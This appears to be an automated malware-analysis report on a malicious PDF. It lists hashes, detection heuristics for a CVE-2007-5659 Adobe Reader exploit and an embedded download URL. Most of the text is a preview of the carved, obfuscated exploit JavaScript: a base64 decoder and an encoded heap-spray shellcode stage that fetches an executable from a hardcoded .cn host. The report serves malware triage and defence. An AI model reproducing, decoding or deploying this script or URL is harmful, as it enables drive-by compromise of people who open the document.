PDF malware analysis — malicious · 8e37e4eff65e9388

MALICIOUS

PDF

3.0 KB First seen: 2013-02-24

MD5: daa8d578650f6614f4fb58fd4c286181 SHA-1: 0cbf5055c848500ba7a38279bc03841efb3e4a60 SHA-256: 8e37e4eff65e9388557c1a673b1ef15c2bd425bb0da289130a28484b665f9419

258 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript, named 'javascript_obj0009_000.js', is likely responsible for downloading and executing a second-stage payload, a common technique for initial access. The use of String.fromCharCode suggests obfuscation within the script.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.herosima1yet00g.cn/myexp/getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	20977 bytes
SHA-256: `9ba99b26bac63f11cf40df3e7f734e05dd338d1f8b81c291db9bffa0f8031603`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode64(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyXXXStr.indexOf(input.charAt(i++)); enc2 = keyXXXStr.indexOf(input.charAt(i++)); enc3 = keyXXXStr.indexOf(input.charAt(i++)); enc4 = keyXXXStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) \| (enc2 >> 4); chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2); chr3 = ((enc3 & 3) << 6) \| enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; } var aasd = decode64("CiB2YXIgeTdCbmFPR1JPID0gbmV3IEFycmF5KCk7CiB2YXIgWUdDZ0FTYmt1OwogdmFyIGxhdmUgPSBldmFsOwogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU0OCU1MyU0NyU2ZiU1OCU2NSU0YSU0MyU1YSUyOCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyYyUyMCU2YSU2YSU3NyUzMiU2OSU0MyU0NCU0ZiU0ZSUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU2YSU2YSU3NyUzMiU2OSU0MyU0NCU0ZiU0ZSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyMCUyYiUzZCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyMCUzZCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU2YSU2YSU3NyUzMiU2OSU0MyU0NCU0ZiU0ZSUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUzYiUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU2MSUzMSUzOCU2MiU1NCU1YSU3MiU0OCUzNyUyOCU3MSU2MSU0YSUzNSU2YSU1NiU3NCU2ZSU0MSUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU2OSU2NiUyOCU3MSU2MSU0YSUzNSU2YSU1NiU3NCU2ZSU0MSUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1OCUzMiU2NCU0YSU2NSU0ZCU0NiU2NiUzNiUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2MiU3NCU1NCU3MCU1YSU1NSU3OCU0MiU3OCUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNyUzMiU0NiUyNSU3NSUzNyUzNyUzNyUzNyUyNSU3NSUzNiUzOCUzMiU0NSUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU3MSU2MSU0YSUzNSU2YSU1NiU3NCU2ZSU0MSUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU1OCUzMiU2NCU0YSU2NSU0ZCU0NiU2NiUzNiUyMCUzZCUyMCUzMCU3OCUzMyUzMCUzMyUzMCUzMyUzMCUzMyUzMCUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2MiU3NCU1NCU3MCU1YSU1NSU3OCU0MiU3OCUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNyUzMiU0NiUyNSU3NSUzNyUzNyUzNyUzNyUyNSU3NSUzNiUzOCUzMiU0NSUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU3MSU2MSU0YSUzNSU2YSU1NiU3NCU2ZSU0MSUyMCUzZCUzZCUyMCUzMiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2MiU3NCU1NCU3MCU1YSU1NSU3OCU0MiU3OCUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNyUzMiU0NiUyNSU3NSUzNyUzNyUzNyUzNyUyNSU3NSUzNiUzOCUzMiU0NSUyNSU3NSUzNyUzMiUzNiUzNSUyNSU3NSUzNyUzMyUzNiU0NiUyNSU3NSUzNiU0NCUzNiUzOSUyNSU3NSUzMyUzMSUzNiUzMSUyNSU3NSUzNiUzNSUzNyUzOSUyNSU3NSUzMyUzMCUzNyUzNCUyNSU3NSUzNiUzNyUzMyUzMCUyNSU3NSUzNiUzMyUzMiU0NSUyNSU3NSUzMiU0NiUzNiU0NSUyNSU3NSUzNyUzOSUzNiU0NCUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzMiU0NiUzNyUzMCUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1OSUzMyU0NSU2NCU1OSU3MCU3OCU2NCU1YSUyMCUzZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2OCU1NyU0ZCU2NCU0YyU0ZiU0NyU2NSUzNCUyMCUzZCUyMCU2MiU3NCU1NCU3MCU1YSU1NSU3OCU0MiU3OCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YSU2YSU3NyUzMiU2OSU0MyU0NCU0ZiU0ZSUyMCUzZCUyMCU1OSUzMyU0NSU2NCU